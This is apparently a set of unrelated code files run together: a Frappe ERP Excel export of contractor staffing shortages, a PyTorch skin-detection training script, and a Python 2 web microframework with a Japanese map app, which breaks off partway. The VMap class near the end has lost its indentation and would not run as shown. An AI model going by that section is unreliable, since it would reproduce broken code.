clone_handler = CommandHandler(BotCommands.CloneCommand, cloneNode, filters=CustomFilters.authorized_chat | CustomFilters.authorized_user, run_async=True)
dispatcher.add_handler(clone_handler)
|
from __future__ import unicode_literals
import math
import frappe
from frappe.utils import cstr, add_days, date_diff, getdate, format_date
from frappe import _, bold
from frappe.utils.csvutils import UnicodeWriter, read_csv_content
from frappe.utils.data import format_date
from frappe.utils.file_manager import get_file
from frappe.model.document import Document
from frappe.utils.background_jobs import enqueue
from datetime import date, timedelta, datetime
import openpyxl
from openpyxl import Workbook
import openpyxl
import xlrd
import re
from openpyxl.styles import Font, Alignment, Border, Side
from openpyxl import load_workbook
from openpyxl.utils import get_column_letter
from openpyxl.styles import GradientFill, PatternFill
from six import BytesIO, string_types
@frappe.whitelist()
def download():
    """Whitelisted endpoint: stream the 'cl plan shortage' workbook.

    build_xlsx_response() populates frappe.response as a side effect and
    returns None, so its return value is intentionally not kept (the old
    `test = ...` assignment was dead code).
    """
    filename = 'cl plan shortage'
    build_xlsx_response(filename)
# Build the workbook in memory and return it as a BytesIO object.
def make_xlsx(data, sheet_name=None, wb=None, column_widths=None):
    """Assemble the shortage workbook: three header rows plus one row per
    active contractor and a TOTAL row, all driven by frappe.local.form_dict.

    NOTE(review): the `data` parameter is never read (it is overwritten from
    get_data()) and `column_widths` is normalised but unused -- callers pass
    the filename as `data`; confirm before tightening the signature.
    """
    args = frappe.local.form_dict
    column_widths = column_widths or []
    if wb is None:
        wb = openpyxl.Workbook()
    ws = wb.create_sheet(sheet_name, 0)
    # Three stacked header rows: dates, weekday names, metric labels.
    header = add_header(args)
    ws.append(header)
    header = add_day_header(args)
    ws.append(header)
    header = add_header_emp_type(args)
    ws.append(header)
    data = get_data(args)
    for row in data:
        ws.append(row)
    ws.sheet_view.zoomScale = 70
    xlsx_file = BytesIO()
    wb.save(xlsx_file)
    return xlsx_file
def build_xlsx_response(filename):
    """Fill frappe.response so the framework streams *filename*.xlsx back."""
    workbook_buffer = make_xlsx(filename)
    # Hand the binary payload to frappe's response machinery.
    frappe.response['type'] = 'binary'
    frappe.response['filename'] = filename + '.xlsx'
    frappe.response['filecontent'] = workbook_buffer.getvalue()
@frappe.whitelist()
def add_header(args):
    """First header row: leading '488' cell, one formatted date per
    5-column day group, then the OVERALL TOTAL column.

    The loop variable no longer shadows `date` imported from datetime at
    module level.
    """
    header = ["488"]
    dates = get_dates(args)
    for date_str in dates:
        # Re-render ISO dates (YYYY-MM-DD) as e.g. 01-Jan-2024; the date
        # heads a group of five metric columns, hence four blank fillers.
        formatted = datetime.strptime(date_str, '%Y-%m-%d').strftime('%d-%b-%Y')
        header.extend([formatted, '', '', '', ''])
    header.append('OVERALL TOTAL')
    return header
@frappe.whitelist()
def add_day_header(args):
    """Second header row: abbreviated weekday name ('Mon', ...) per day group.

    Replaces the roundabout `datetime.date(date).strftime(...)` unbound-method
    call with a direct strftime on the parsed datetime, and stops shadowing
    the module-level `date` import.
    """
    day_header = ["488"]
    dates = get_dates(args)
    for date_str in dates:
        day = datetime.strptime(date_str, '%Y-%m-%d').strftime('%a')
        day_header.extend([day, '', '', '', ''])
    return day_header
@frappe.whitelist()
def add_header_emp_type(args):
    """Third header row: the five metric labels repeated once per day plus
    one extra group for the OVERALL TOTAL columns."""
    emp_type = ['plan','actual','diff','shortage','amount to be debited']
    # len(dates) day groups + 1 trailing overall-total group.
    return [""] + emp_type * (len(get_dates(args)) + 1)
@frappe.whitelist()
def get_data(args):
    """One row per active contractor: per-day (plan, actual, diff, shortage%,
    amount-to-debit) groups followed by the overall-total group, plus a final
    TOTAL row appended at the end.

    NOTE(review): diff here is actual - plan, while total() uses plan -
    actual; preserved as-is, confirm the intended sign convention.
    """
    data = []
    contractors = frappe.get_all('Contractor', {'status': 'Active'})
    for contractor in contractors:
        side_sum = 0    # planned head count accumulated across all days
        side_count = 0  # actual head count accumulated across all days
        side_short = 0  # overall shortage percentage accumulator
        row = [contractor.name]
        dates = get_dates(args)
        for day in dates:
            planned = 0  # renamed from `sum`, which shadowed the builtin
            if frappe.db.exists('CL Head Count Plan', {'contractor': contractor.name, 'date': day}):
                plan = frappe.get_doc('CL Head Count Plan', {'contractor': contractor.name, 'date': day})
                planned = plan.shift_1 + plan.shift_2 + plan.shift_3 + plan.shift_pp1 + plan.shift_pp2
            # Parameterized query: the old version interpolated the contractor
            # name and date directly into the SQL string (injectable, and it
            # broke on names containing quotes).
            count = frappe.db.sql("""select count(*) as count from `tabQR Checkin`
                left join `tabEmployee` on `tabQR Checkin`.employee = `tabEmployee`.name
                where `tabEmployee`.contractor=%s and `tabQR Checkin`.shift_date=%s and ot = 0
                """, (contractor.name, day), as_dict=True)
            count = count[0].count if count else 0
            diff = count - planned
            try:
                shortage = (diff / planned) * 100
            except ZeroDivisionError:
                shortage = 0
            short_percent = str(math.floor(shortage)) + '%'
            amt_debt = diff * 488  # 488 = per-head debit rate (matches header)
            row.extend([planned, count, diff, short_percent, amt_debt])
            side_sum += planned
            side_count += count
        # Overall-total group for the contractor.
        side_diff = side_sum - side_count
        try:
            shortage = (side_diff / side_sum) * 100
        except ZeroDivisionError:
            shortage = 0
        side_short += shortage
        short_percent = str(math.floor(side_short)) + '%'
        amount_debt = side_diff * 488
        row.extend([side_sum, side_count, side_diff, short_percent, amount_debt])
        data.append(row)
    data.append(total(args))
    return data
def get_dates(args):
    """Every date from args.from_date through args.to_date, inclusive."""
    span = date_diff(add_days(args.to_date, 1), args.from_date)
    return [add_days(args.from_date, offset) for offset in range(span)]
def total(args):
    """Trailing TOTAL row: per-day aggregates (plan, actual, diff, shortage%,
    amount to debit) across all active contractors.

    NOTE(review): unlike the contractor rows this row has no overall-total
    group, and diff is plan - actual (contractor rows use actual - plan);
    preserved as-is -- confirm intended.
    """
    data = ['TOTAL', ]
    dates = get_dates(args)
    contractors_list = [c.name for c in frappe.get_all('Contractor', {'status': 'Active'})]
    row = []
    for day in dates:
        plan_total = 0
        actual_total = 0
        diff = 0
        amount_debt = 0
        if frappe.db.exists('CL Head Count Plan', {'contractor': ('in', contractors_list), 'date': day}):
            plans = frappe.get_all('CL Head Count Plan', {'contractor': ('in', contractors_list), 'date': day})
            for p in plans:
                plan = frappe.get_doc("CL Head Count Plan", p.name)
                # Unset shifts come back falsy (None/0); coerce each to 0.
                plan_total += ((plan.shift_1 or 0) + (plan.shift_2 or 0) + (plan.shift_3 or 0)
                               + (plan.shift_pp1 or 0) + (plan.shift_pp2 or 0))
        row.append(plan_total)
        # Parameterized IN clause: the old version interpolated
        # tuple(contractors_list) into the SQL, which is injectable and emits
        # invalid SQL for a single contractor (Python's trailing comma in
        # one-element tuples); frappe expands a list bound to %s correctly.
        count = frappe.db.sql("""select count(*) as count from `tabQR Checkin`
            left join `tabEmployee` on `tabQR Checkin`.employee = `tabEmployee`.name
            where `tabEmployee`.contractor in %s and `tabQR Checkin`.shift_date=%s and ot = 0
            """, (contractors_list, day), as_dict=True)
        actual_total += count[0].count if count else 0
        row.append(actual_total)
        diff_value = plan_total - actual_total
        diff += diff_value
        row.append(diff)
        try:
            shortage = (diff / actual_total) * 100
        except ZeroDivisionError:
            shortage = 0
        row.append(str(math.floor(shortage)) + '%')
        amount_debt += diff_value * 488  # 488 = per-head debit rate
        row.append(amount_debt)
    data.extend(row)
    return data
|
<gh_stars>0
#!/usr/bin/env python
# <NAME>
# 3-Jul-2020 16:01
import os
import sys
import re
from os import listdir
import shutil
import glob
from PIL import Image
import imageio
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
import torch.utils.data as data_utils
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
import subprocess
import pdb
def resize_imgs(img_dir):
    """Resize every jpg/png/jpeg in *img_dir* to 150x150, save it as .jpg,
    and archive each original under img_dir/ori."""
    img_dir_ori = f"{img_dir}/ori"
    if not os.path.isdir(img_dir_ori):
        os.mkdir(img_dir_ori)
    # Compile once instead of per file; the pattern is deliberately loose
    # (substring match), matching the original selection behaviour.
    img_pattern = re.compile('(jpg|png|jpeg)', flags=re.IGNORECASE)
    imgFLs = [f for f in glob.glob(f"{img_dir}/*") if img_pattern.search(f)]
    for imgFL in imgFLs:
        img = Image.open(imgFL)
        img_new = img.resize((150, 150))
        try:
            shutil.move(imgFL, f"{img_dir_ori}")
        except shutil.Error:
            # Already archived on a previous run; the copy left in img_dir
            # is redundant, so drop it.  (Was a bare except.)
            os.remove(imgFL)
        newFL = os.path.splitext(imgFL)[0] + '.jpg'
        try:
            img_new.save(newFL)
        except (OSError, ValueError):
            # e.g. RGBA PNGs cannot be written as JPEG without conversion.
            print(f"Error: cannot save {imgFL}")
    print(f"Resized imgs under: {img_dir}/xx.jpg")
# One-off preprocessing pass over every dataset split.
# NOTE(review): runs at import time and expects a local ./Dataset tree.
resize_imgs('Dataset/train/nonSkinPhoto')
resize_imgs('Dataset/train/SkinPhoto')
resize_imgs('Dataset/validation/neg')
resize_imgs('Dataset/validation/pos')
resize_imgs('Dataset/test/neg')
resize_imgs('Dataset/test/pos')
class Net(nn.Module):
    """Per-pixel skin classifier: two 1x1 convolutions with an ELU between
    and a sigmoid head, producing an (N, 1, H, W) probability map.

    bn0/bn1 are registered (and therefore live in checkpoints) even though
    the forward pass skips them; see the commented-out relu/bn experiment in
    the original training notes.
    """

    def __init__(self):
        super(Net, self).__init__()
        self.bn0 = nn.BatchNorm2d(3)
        self.conv1 = nn.Conv2d(3, 32, (1, 1), stride=1)
        self.bn1 = nn.BatchNorm2d(32)
        self.conv2 = nn.Conv2d(32, 1, (1, 1), stride=1)
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        hidden = F.elu(self.conv1(x))
        return self.sigmoid(self.conv2(hidden))
# Instantiate once at import time and print the layer summary for a
# 150x150 RGB input (torchsummary walks the module on CPU).
net = Net()
summary(net, input_size=(3, 150, 150))
def get_Flnames(img_dir_pos, img_dir_neg):
    """Collect .jpg paths from a positive and a negative directory.

    Returns (imgFLs, labels): positives first (label 1), then negatives
    (label 0), each in os.listdir order.
    """
    # The old pattern '.+.jpg' had an unescaped dot and no anchor, so it also
    # matched names like 'axjpgz'; require a real '.jpg' suffix instead.
    imgFLs_pos = [f"{img_dir_pos}/{f}" for f in os.listdir(img_dir_pos) if re.search(r'.+\.jpg$', f)]
    imgFLs_neg = [f"{img_dir_neg}/{f}" for f in os.listdir(img_dir_neg) if re.search(r'.+\.jpg$', f)]
    imgFLs = imgFLs_pos + imgFLs_neg
    num_pos = len(imgFLs_pos)
    num_neg = len(imgFLs_neg)
    labels = [1] * num_pos + [0] * num_neg
    print(f"\n{num_pos} positive imgs read from {img_dir_pos}")
    print(f"{num_neg} negtive imgs read from {img_dir_neg}\n")
    return imgFLs, labels
class myDataset(data_utils.Dataset):
    """Dataset over parallel lists of image file paths and integer labels.

    __getitem__ decodes the file with imageio and converts the HWC uint8
    array into a CHW float tensor scaled into [0, 1].
    """

    def __init__(self, imgFLs, labels):
        self.imgFLs = imgFLs
        self.labels = labels

    def __len__(self):
        return len(self.imgFLs)

    def __getitem__(self, idx):
        path = self.imgFLs[idx]
        target = self.labels[idx]
        pixels = imageio.imread(path)
        tensor = torch.Tensor(pixels).permute([2, 0, 1]) / 255
        return tensor, target
def train_one_epo(net, data_loader):
    """Run one training epoch; returns (net, mean loss over batches).

    NOTE(review): depends on a module-level `optimizer` -- confirm it is
    created before the first call (it is, at the bottom of this script).
    """
    net.train()
    criterion = nn.BCELoss()  # hoisted: no need to rebuild per batch
    losses = []
    for x, targets in data_loader:
        optimizer.zero_grad()
        y = net(x)
        loss = criterion(torch.mean(y, dim=[1, 2, 3]), targets.to(torch.float))
        loss.backward()
        # .item() detaches the scalar; appending the live tensor kept every
        # batch's autograd graph alive until the epoch ended.
        losses.append(loss.item())
        optimizer.step()
    loss_ave = sum(losses) / len(losses)
    return net, loss_ave
def evaluate(net, data_loader):
    """Mean BCE loss over *data_loader* with gradients disabled.

    Uses .item() so no graph is retained and the return value is a plain
    float (the old version returned a 0-d tensor).
    """
    net.eval()
    criterion = nn.BCELoss()  # hoisted out of the batch loop
    losses = []
    with torch.no_grad():
        for x, targets in data_loader:
            y = net(x)
            loss = criterion(torch.mean(y, dim=[1, 2, 3]), targets.to(torch.float))
            losses.append(loss.item())
    return sum(losses) / len(losses)
def prepare_dataset(img_dir_pos, img_dir_neg, batch_size):
    """Build a shuffling DataLoader over the .jpg files in the two dirs.

    The unused `index` list from the original was removed.
    """
    imgFLs, labels = get_Flnames(img_dir_pos, img_dir_neg)
    dataset = myDataset(imgFLs, labels)
    return data_utils.DataLoader(dataset, batch_size=batch_size,
                                 shuffle=True, num_workers=2)
def train(net, epoches, data_loader_train, data_loader_eval):
    """Train for *epoches* epochs; checkpoint and dump preview images each
    epoch.  Returns (net, per-epoch train losses, per-epoch eval losses).

    The unused `mini_batch` counter from the original was removed.
    """
    losses_train = torch.Tensor(epoches)
    losses_eval = torch.Tensor(epoches)
    for epoch in range(epoches):
        net, loss_train = train_one_epo(net, data_loader_train)
        loss_eval = evaluate(net, data_loader_eval)
        print(f"epoch = {epoch}, loss_train = {loss_train:.4f}, loss_eval = {loss_eval:.4f}")
        losses_train[epoch] = loss_train
        losses_eval[epoch] = loss_eval
        # -- checkpoint every epoch
        if not os.path.isdir('networks'):
            os.mkdir('networks')
        modelFL = f"networks/model_epo{epoch}.pt"
        torch.save(net.state_dict(), modelFL)
        print(f"--> One epoch finished. Modeled saved: {modelFL}")
        if epoch % 1 == 0:  # every epoch; raise the modulus to thin previews
            if not os.path.isdir("pred_imgs"):
                os.mkdir("pred_imgs")
            outputFL = f"pred_imgs/eval_{epoch}.png"
            visual_check(modelFL, 'Dataset/validation/pos/', outputFL)
            outputFL = f"pred_imgs/train_{epoch}.png"
            visual_check(modelFL, 'Dataset/train/SkinPhoto/', outputFL)
    return net, losses_train, losses_eval
def plot_loss(losses_train, losses_eval):
    """Persist per-epoch losses (losses_*.pt and losses.tsv) and render the
    plots by shelling out to an R script."""
    # Save raw tensors for later reloading.
    torch.save(losses_train, "losses_train.pt")
    torch.save(losses_eval, "losses_eval.pt")
    # Save a tab-separated table for the R plotting script.
    frame = pd.DataFrame(
        torch.stack((losses_train, losses_eval), dim=1).detach().numpy(),
        columns=['train', 'eval'])
    frame.to_csv('losses.tsv', sep='\t', index=False)
    print("losses.tsv generated.")  # was an f-string with no placeholder
    # check_call raises CalledProcessError if Rscript fails.
    subprocess.check_call(['Rscript', 'plot_losses.R', 'losses.tsv'])
def black_white(im_new, cutoff = 0.5):
    """Threshold *im_new* in place: values >= cutoff become 1, the rest 0.

    Mutates and returns the same tensor; input values are expected in [0, 1].
    """
    bright = im_new >= cutoff
    # The mask is computed from the pre-mutation values, so the two
    # assignments below cannot interfere with each other.
    im_new[~bright] = 0
    im_new[bright] = 1
    return im_new
def visual_check(networkFL, img_dir, outputFL):
    """Load checkpoint *networkFL*, run it on every file in *img_dir* and
    save one tall PNG of (original | prediction) pairs stacked vertically."""
    net = Net()
    net.load_state_dict(torch.load(networkFL))
    net.eval()
    imgFLs = [f"{img_dir}/{f}" for f in os.listdir(img_dir) if os.path.isfile(f"{img_dir}/{f}")]
    n_imgs = len(imgFLs)
    print(f"There are {n_imgs} images under {img_dir}")
    with torch.no_grad():
        images = torch.Tensor().to(torch.uint8)
        for i in range(len(imgFLs)):
            im = imageio.imread(imgFLs[i])
            # HWC uint8 -> NCHW float, predict, then back to a uint8 map.
            im_new = net(torch.Tensor(im).unsqueeze(0).permute(0,3,1,2))
            im_new = (im_new*255).squeeze().to(torch.uint8)
            # Replicate the single channel so it can sit next to the RGB
            # input: [150, 150] -> [150, 150, 3].
            im_new = torch.stack((im_new, im_new, im_new), dim = 2)
            im = torch.Tensor(im).to(torch.uint8)
            # Original and prediction side-by-side, then stacked row-wise.
            this_im = torch.cat((im, im_new), dim = 1)
            images = torch.cat((images, this_im), dim = 0)
    # save into file
    imageio.imsave(outputFL,images.to(torch.uint8).numpy())
    print(f"{outputFL} generated.")
# -- train and evaluate ------------------------------------------------------
data_loader_train = prepare_dataset(img_dir_pos='Dataset/train/SkinPhoto',
                                    img_dir_neg='Dataset/train/nonSkinPhoto', batch_size=5)
data_loader_eval = prepare_dataset(img_dir_pos='Dataset/validation/pos',
                                   img_dir_neg='Dataset/validation/neg', batch_size=20)
net = Net()
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"device: {device}")
net.to(device)
# net.load_state_dict(torch.load('networks/old/model_epo299.pt'))
optimizer = torch.optim.Adam(net.parameters())
epoches = 50
net, losses_train, losses_eval = train(net, epoches, data_loader_train, data_loader_eval)
plot_loss(losses_train, losses_eval)

# -- report the checkpoint with the lowest eval loss (the loss is only a
# rough proxy for quality here).
loss_min, idx = torch.min(losses_eval, 0)
# BUG FIX: checkpoints are written to 'networks/', not 'neworks/'.
networkFL = f'networks/model_epo{idx}.pt'
print(f"Model with the lowest eval loss: {networkFL}, epoch = {idx}, and loss_eval = {loss_min:4f}")
sys.exit()

# networkFL = 'networks/model_epo11.pt'
# outputFL = f"pred_imgs/test_{11}.png"
# visual_check(networkFL, 'Dataset/test/pos/' , outputFL)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##
## Whabapp - A Web application microframework
##
## usage: $ python app.py -s localhost 8080
##
import sys
import re
import cgi
import os.path
import sqlite3
# quote HTML metacharacters.
def q(s):
    """Escape &, >, <, double and single quotes for safe HTML embedding
    (Python 2: accepts str or unicode)."""
    assert isinstance(s, basestring), s
    escaped = s
    # '&' must be first so already-produced entities are not re-escaped.
    for raw, entity in (('&', '&amp;'), ('>', '&gt;'), ('<', '&lt;'),
                        ('"', '&quot;'), ("'", '&#039;')):
        escaped = escaped.replace(raw, entity)
    return escaped
# encode as a URL.
URLENC = re.compile(r'[^a-zA-Z0-9_.-]')
def urlenc(url, codec='utf-8'):
    """Percent-encode *url*: every byte outside [A-Za-z0-9_.-] becomes %XX.

    Python 2 semantics: url.encode(codec) yields a byte string whose items
    are single-character strings, so ord() works per encoded byte.
    """
    def f(m):
        return '%%%02X' % ord(m.group(0))
    return URLENC.sub(f, url.encode(codec))
# remove redundant spaces.
RMSP = re.compile(r'\s+', re.U)
def rmsp(s):
    """Trim *s* and collapse each internal whitespace run to one space."""
    trimmed = s.strip()
    return RMSP.sub(' ', trimmed)
# merge two dictionaries.
def mergedict(d1, d2):
    """Return a new dict with d1's entries overlaid by d2's (d2 wins on
    clashes); neither input is modified."""
    merged = dict(d1)
    merged.update(d2)
    return merged
# iterable
def iterable(obj):
    """True if *obj* advertises __iter__ (on Python 2 this excludes str)."""
    return hasattr(obj, '__iter__')
# closable
def closable(obj):
    """True if *obj* has a close() attribute (files, cursors, generators)."""
    return hasattr(obj, 'close')
## Template
##
class Template(object):
    """Lazy text template: literal chunks interleaved with placeholders.

    Placeholder syntax (parsed by _VARIABLE):
      $(name) -> value, HTML-quoted
      $[name] -> value, URL-encoded
      $<name> -> value, inserted raw
    Values may be strings, nested Templates, callables or iterables and are
    resolved lazily while rendering (render() is a generator).
    """
    debug = 0
    def __init__(self, *args, **kwargs):
        # '_copyfrom' is the internal copy-constructor path used by
        # __call__: reuse the parsed objs and overlay new keyword bindings.
        if '_copyfrom' in kwargs:
            _copyfrom = kwargs['_copyfrom']
            objs = _copyfrom.objs
            kwargs = mergedict(_copyfrom.kwargs, kwargs)
        else:
            # Parse each literal line into text fragments and Variable markers.
            objs = []
            for line in args:
                i0 = 0
                for m in self._VARIABLE.finditer(line):
                    objs.append(line[i0:m.start(0)])
                    x = m.group(1)
                    if x == '$':
                        # NOTE(review): unreachable with the current _VARIABLE
                        # pattern (it has no bare-'$' alternative) -- confirm.
                        objs.append(x)
                    else:
                        # x is e.g. '(name)': the opening bracket is kept as
                        # the type tag, the closing bracket is stripped.
                        objs.append(self.Variable(x[0], x[1:-1]))
                    i0 = m.end(0)
                objs.append(line[i0:])
        self.objs = objs
        self.kwargs = kwargs
        return
    def __call__(self, **kwargs):
        # Copy with extra bindings; the parse result (objs) is shared.
        return self.__class__(_copyfrom=self, **kwargs)
    def __iter__(self):
        return self.render()
    def __repr__(self):
        return '<Template %r>' % self.objs
    def __str__(self):
        return ''.join(self)
    @classmethod
    def load(klass, lines, **kwargs):
        """Build a Template from an iterable of lines (e.g. an open file),
        closing the source if it supports close()."""
        template = klass(*lines, **kwargs)
        if closable(lines):
            lines.close()
        return template
    def render(self, codec='utf-8', **kwargs):
        """Yield rendered fragments; call-time kwargs override bound ones."""
        kwargs = mergedict(self.kwargs, kwargs)
        def render1(value, quote=False):
            # Recursively expand one value; quote=True HTML-quotes leaves.
            if value is None:
                pass
            elif isinstance(value, Template):
                if quote:
                    # Nested templates may not appear in a quoted context.
                    if 2 <= self.debug:
                        raise ValueError
                    elif self.debug:
                        yield '[ERROR: Template in a quoted context]'
                else:
                    for x in value.render(codec=codec, **kwargs):
                        yield x
            elif isinstance(value, dict):
                if 2 <= self.debug:
                    raise ValueError
                elif self.debug:
                    yield '[ERROR: Dictionary included]'
            elif isinstance(value, basestring):
                if quote:
                    yield q(value)
                else:
                    yield value
            elif callable(value):
                # Callables are invoked with the render-time bindings.
                for x in render1(value(**kwargs), quote=quote):
                    yield x
            elif iterable(value):
                for obj1 in value:
                    for x in render1(obj1, quote=quote):
                        yield x
            else:
                if quote:
                    yield q(unicode(value))
                else:
                    if 2 <= self.debug:
                        raise ValueError
                    elif self.debug:
                        yield '[ERROR: Non-string object in a non-quoted context]'
            return
        for obj in self.objs:
            if isinstance(obj, self.Variable):
                k = obj.name
                if k in kwargs:
                    value = kwargs[k]
                elif k in self.kwargs:
                    value = self.kwargs[k]
                else:
                    # Unbound placeholder: render a visible marker instead.
                    yield '[notfound:%s]' % k
                    continue
                if obj.type == '(':
                    for x in render1(value, quote=True):
                        yield x
                    continue
                elif obj.type == '[':
                    yield urlenc(value)
                    continue
            else:
                value = obj
            # Raw $<name> values and literal fragments end up here.
            for x in render1(value):
                yield x
        return
    _VARIABLE = re.compile(r'\$(\(\w+\)|\[\w+\]|<\w+>)')
    class Variable(object):
        """A parsed placeholder: `type` is '(', '[' or '<'; `name` the key."""
        def __init__(self, type, name):
            self.type = type
            self.name = name
            return
        def __repr__(self):
            if self.type == '(':
                return '$(%s)' % self.name
            elif self.type == '[':
                return '$[%s]' % self.name
            else:
                return '$<%s>' % self.name
## Router
##
class Router(object):
    """Binds an HTTP method and a compiled path regex to a handler function."""

    def __init__(self, method, regex, func):
        self.method = method
        self.regex = regex
        self.func = func
        return

    @staticmethod
    def make_wrapper(method, pat):
        """Decorator factory: wrap a handler into a Router matching *method*
        and the fully anchored pattern *pat*."""
        compiled = re.compile('^' + pat + '$')
        def wrapper(func):
            return Router(method, compiled, func)
        return wrapper
# Route decorators: @GET('/path') / @POST('/path') turn a method into a Router.
def GET(pat): return Router.make_wrapper('GET', pat)
def POST(pat): return Router.make_wrapper('POST', pat)
## Response
##
class Response(object):
    """HTTP status line plus header list; extra keyword args become headers."""

    def __init__(self, status='200 OK', content_type='text/html; charset=utf-8', **kwargs):
        self.status = status
        # Build with append instead of `list + kwargs.items()`: on Python 3
        # items() is a view and that concatenation raises TypeError; this
        # form is identical on Python 2.
        self.headers = [('Content-Type', content_type)]
        for item in kwargs.items():
            self.headers.append(item)
        return

    def add_header(self, k, v):
        """Append one (name, value) header pair."""
        self.headers.append((k, v))
        return
class Redirect(Response):
    """302 response pointing the client at *location*."""
    def __init__(self, location):
        Response.__init__(self, '302 Found', Location=location)
        return
class NotFound(Response):
    """404 response; pair it with an HTML body when yielding."""
    def __init__(self):
        Response.__init__(self, '404 Not Found')
        return
class InternalError(Response):
    """500 response used when a handler cannot be invoked."""
    def __init__(self):
        Response.__init__(self, '500 Internal Server Error')
        return
## WebApp
##
class WebApp(object):
    """Minimal WSGI application base: dispatches requests to Router-decorated
    methods and streams whatever they yield (Response, Template, strings)."""
    debug = 0
    codec = 'utf-8'
    def run(self, environ, start_response):
        """WSGI entry point: route the request, invoke the handler, render."""
        method = environ.get('REQUEST_METHOD', 'GET')
        path = environ.get('PATH_INFO', '/')
        fp = environ.get('wsgi.input')
        fields = cgi.FieldStorage(fp=fp, environ=environ)
        result = None
        # Scan attributes for Router objects matching method + path.
        for attr in dir(self):
            router = getattr(self, attr)
            if not isinstance(router, Router): continue
            if router.method != method: continue
            m = router.regex.match(path)
            if m is None: continue
            # Handler arguments are filled from form fields first, then
            # from regex groups / request metadata (the _-prefixed params).
            params = m.groupdict().copy()
            params['_path'] = path
            params['_fields'] = fields
            params['_environ'] = environ
            # Python 2: func_code/co_varnames expose the handler's signature.
            code = router.func.func_code
            args = code.co_varnames[:code.co_argcount]
            kwargs = {}
            for k in args[1:]:
                if k in fields:
                    kwargs[k] = fields.getvalue(k)
                elif k in params:
                    kwargs[k] = params[k]
            try:
                result = router.func(self, **kwargs)
            except TypeError:
                # A required handler argument was missing from the request.
                if 2 <= self.debug:
                    raise
                elif self.debug:
                    result = [InternalError()]
            break
        if result is None:
            result = self.get_default(path, fields, environ)
        def f(obj):
            # Flatten handler output: the first Response starts the WSGI
            # reply; Templates and nested iterables are rendered inline and
            # unicode is encoded with the app codec.
            if isinstance(obj, Response):
                start_response(obj.status, obj.headers)
            elif isinstance(obj, Template):
                for x in obj.render(codec=self.codec):
                    if isinstance(x, unicode):
                        x = x.encode(self.codec)
                    yield x
            elif iterable(obj):
                for x in obj:
                    for y in f(x):
                        yield y
            else:
                if isinstance(obj, unicode):
                    obj = obj.encode(self.codec)
                yield obj
        return f(result)
    def get_default(self, path, fields, environ):
        """Fallback when no route matched; override for custom 404 pages."""
        return [NotFound(), '<html><body>not found</body></html>']
# run_server
def run_server(host, port, app):
    """Serve *app* forever with wsgiref's reference HTTP server."""
    from wsgiref.simple_server import make_server
    print >>sys.stderr, 'Serving on %r port %d...' % (host, port)
    httpd = make_server(host, port, app.run)
    httpd.serve_forever()
# run_cgi
def run_cgi(app):
    """Handle exactly one request as a plain CGI script."""
    from wsgiref.handlers import CGIHandler
    CGIHandler().run(app.run)
# run_httpcgi: for cgi-httpd
def run_httpcgi(app):
    """CGI variant for servers that expect a raw HTTP status line on stdout
    instead of the usual CGI 'Status:' header."""
    from wsgiref.handlers import CGIHandler
    class HTTPCGIHandler(CGIHandler):
        def start_response(self, status, headers, exc_info=None):
            # Emit "<protocol> <status>" before delegating to CGIHandler.
            protocol = self.environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
            sys.stdout.write('%s %s\r\n' % (protocol, status))
            return CGIHandler.start_response(self, status, headers, exc_info=exc_info)
    HTTPCGIHandler().run(app.run)
# main
def main(app, argv):
    """CLI entry point: -d raises the debug level (repeatable), -s serves
    over HTTP on [host [port]] (default: run as CGI)."""
    import getopt
    def usage():
        print 'usage: %s [-d] [-s] [host [port]]' % argv[0]
        return 100
    try:
        (opts, args) = getopt.getopt(argv[1:], 'ds')
    except getopt.GetoptError:
        return usage()
    server = False
    debug = 0
    for (k, v) in opts:
        if k == '-d': debug += 1
        elif k == '-s': server = True
    # The debug level is shared with template rendering and the app class.
    Template.debug = debug
    WebApp.debug = debug
    if server:
        host = ''
        port = 8080
        if args:
            host = args.pop(0)
        if args:
            port = int(args.pop(0))
        run_server(host, port, app)
    else:
        run_httpcgi(app)
    return
## VMap
##
import addrdict
import search_addr
import search_entity
def get_region_name(rgncode):
    """Map a numeric region code to 'prefecture region'.

    PREF is keyed by the leading digits of the code (Python 2 integer
    division by 1000); REGION is keyed by the full code.
    """
    from addrdict import PREF, REGION
    pref = PREF[rgncode/1000]
    region = REGION[rgncode]
    return pref+' '+region
def get_type(props):
    """Human-readable Japanese category label for an OSM property string;
    unknown or missing properties map to the empty string."""
    if props is None:
        return u''
    exact_labels = {
        'highway=bus_stop': u'(バス停)',
        'highway=traffic_signals': u'(信号)',
        'railway=station': u'(駅)',
    }
    if props in exact_labels:
        return exact_labels[props]
    # Exact matches above take precedence over these prefix fallbacks.
    for prefix, label in (('railway=', u'(線路)'),
                          ('highway=', u'(道路)'),
                          ('way=', u'(敷地その他)')):
        if props.startswith(prefix):
            return label
    return u''
def get_dir(vx, vy):
    """Japanese compass name for the vector (vx, vy).

    Within roughly 21.8 degrees of an axis (|minor| < 0.4 * |major|) the
    pure N/S/E/W name is returned; otherwise the diagonal.
    """
    north_south = u'北' if 0 < vy else u'南'
    east_west = u'東' if 0 < vx else u'西'
    if abs(vx) < abs(vy) * 0.4:
        return north_south
    if abs(vy) < abs(vx) * 0.4:
        return east_west
    # Diagonals compose as N/S first, then E/W (e.g. 北東 = NE).
    return north_south + east_west
class VMap(WebApp):
DBPATH = './db/'
HEADER = '''<!DOCTYPE html>
<html>
<head><title>vmap</title></head>
<body>
'''
FOOTER = '''<p>
<address>powered by Vmap</address>
</body>
</html>
'''
def __init__(self):
    # Two sqlite files under DBPATH: OSM entities and the address index.
    self.osm_db = sqlite3.connect(os.path.join(self.DBPATH, 'osm.db'))
    self.addr_db = sqlite3.connect(os.path.join(self.DBPATH, 'addr.db'))
    return
@GET('/')
def index(self, s=u''):
    """Front page: address / postal-code search form; `s` refills the box."""
    yield Response()
    yield self.HEADER
    # Form values arrive as encoded bytes (Python 2); decode and normalise.
    s = rmsp(s.decode(self.codec))
    yield Template(
        u'<h1>vmap</h1>\n'
        u'<form method=GET action="/addr">\n'
        u'住所または郵便番号を入力してください:<br>'
        u'<input name=s size=50 value="$(s)">\n'
        u'<input name=cmd type=submit value="検索">\n'
        u'</form>\n', s=s)
    yield self.FOOTER
    return
@GET('/addr')
def hello(self, s):
    """Address search results page: each match links to /search?p=lat,lng."""
    from search_addr import search, AddrNotFound, NoRegion, NoWord
    yield Response()
    yield self.HEADER
